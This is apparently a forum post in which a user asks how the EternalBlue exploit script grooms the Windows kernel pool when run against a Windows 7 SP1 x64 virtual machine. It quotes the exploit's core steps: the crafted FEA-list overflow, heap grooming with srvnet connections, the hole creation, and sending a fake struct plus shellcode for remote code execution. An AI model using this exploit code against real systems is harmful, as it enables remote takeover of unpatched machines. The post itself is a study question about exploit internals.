about heap spray exploit problem

[SecondBC]

when i use eternalblue_exploit7.py
to attack one virtual machine : win7 with sp1 x64
i have some question!
the origin code is bellow:

---

tid = conn.tree_connect_andx('\\'+target+'\'+'IPC$')

# The minimum requirement to trigger bug in SrvOs2FeaListSizeToNt() is SrvSmbOpen2() which is TRANS2_OPEN2 subcommand.
# Send TRANS2_OPEN2 (0) with special feaList to a target except last fragment
progress = send_big_trans2(conn, tid, 0, feaList, b'\x00'*30, 2000, False)
# we have to know what size of NtFeaList will be created when last fragment is sent

# make sure server recv all payload before starting allocate big NonPaged
#sendEcho(conn, tid, 'a'*12)

# create buffer size NTFEA_SIZE-0x1000 at server
# this buffer MUST NOT be big enough for overflown buffer
allocConn = createSessionAllocNonPaged(target, NTFEA_SIZE - 0x1010)

# groom nonpaged pool
# when many big nonpaged pool are allocated, allocate another big nonpaged pool should be next to the last one
srvnetConn = []
for i in range(numGroomConn):
	sk = createConnectionWithBigSMBFirst80(target)
	srvnetConn.append(sk)

# create buffer size NTFEA_SIZE at server
# this buffer will be replaced by overflown buffer
holeConn = createSessionAllocNonPaged(target, NTFEA_SIZE - 0x10)
# disconnect allocConn to free buffer
# expect small nonpaged pool allocation is not allocated next to holeConn because of this free buffer
allocConn.get_socket().close()

# hope one of srvnetConn is next to holeConn
for i in range(5):
	sk = createConnectionWithBigSMBFirst80(target)
	srvnetConn.append(sk)
	
# send echo again, all new 5 srvnet buffers should be created
#sendEcho(conn, tid, 'a'*12)

# remove holeConn to create hole for fea buffer
holeConn.get_socket().close()

# send last fragment to create buffer in hole and OOB write one of srvnetConn struct header
send_trans2_second(conn, tid, feaList[progress:], progress)
recvPkt = conn.recvSMB()
retStatus = recvPkt.getNTStatus()
# retStatus MUST be 0xc000000d (INVALID_PARAMETER) because of invalid fea flag
if retStatus == 0xc000000d:
	print('good response status: INVALID_PARAMETER')
else:
	print('bad response status: 0x{:08x}'.format(retStatus))
	

# one of srvnetConn struct header should be modified
# a corrupted buffer will write recv data in designed memory address
for sk in srvnetConn:
	sk.send(fake_recv_struct + shellcode)

# execute shellcode by closing srvnet connection
for sk in srvnetConn:
	sk.close()

---

question 1: when first use send_big_trans2 function and returned, if the _MDL structure's MappedSystemVa is covered with 0xffffffffffd00010 - 0x80?

question 2:when first use allocConn = createSessionAllocNonPaged(target, NTFEA_SIZE - 0x1010)
and returned, if the alloc memory start address is the MappedSystemVa , or MappedSystemVa +0x80 ?

question 3: when :
for i in range(numGroomConn):
sk = createConnectionWithBigSMBFirst80(target)
srvnetConn.append(sk)
finished, what the memory looks like? can someone draw a memory struct picture for me?
is createConnectionWithBigSMBFirst80 function alloced memory in allocConn = createSessionAllocNonPaged(target, NTFEA_SIZE - 0x1010) this memory? or just next to it?

question 4: when use holeConn = createSessionAllocNonPaged(target, NTFEA_SIZE - 0x10)
the pool memory is start with address MappedSystemVa or MappedSystemVa +0x80 still?
i just confused with these alloc manipulates ; truely need a picture for the memory change instrument!

question 5:
in my perspective:
send_trans2_second(conn, tid, feaList[progress:], progress) when finished
the last fealist struct will filled in MappedSystemVa +0x80 this addr, is true?

can someone help me?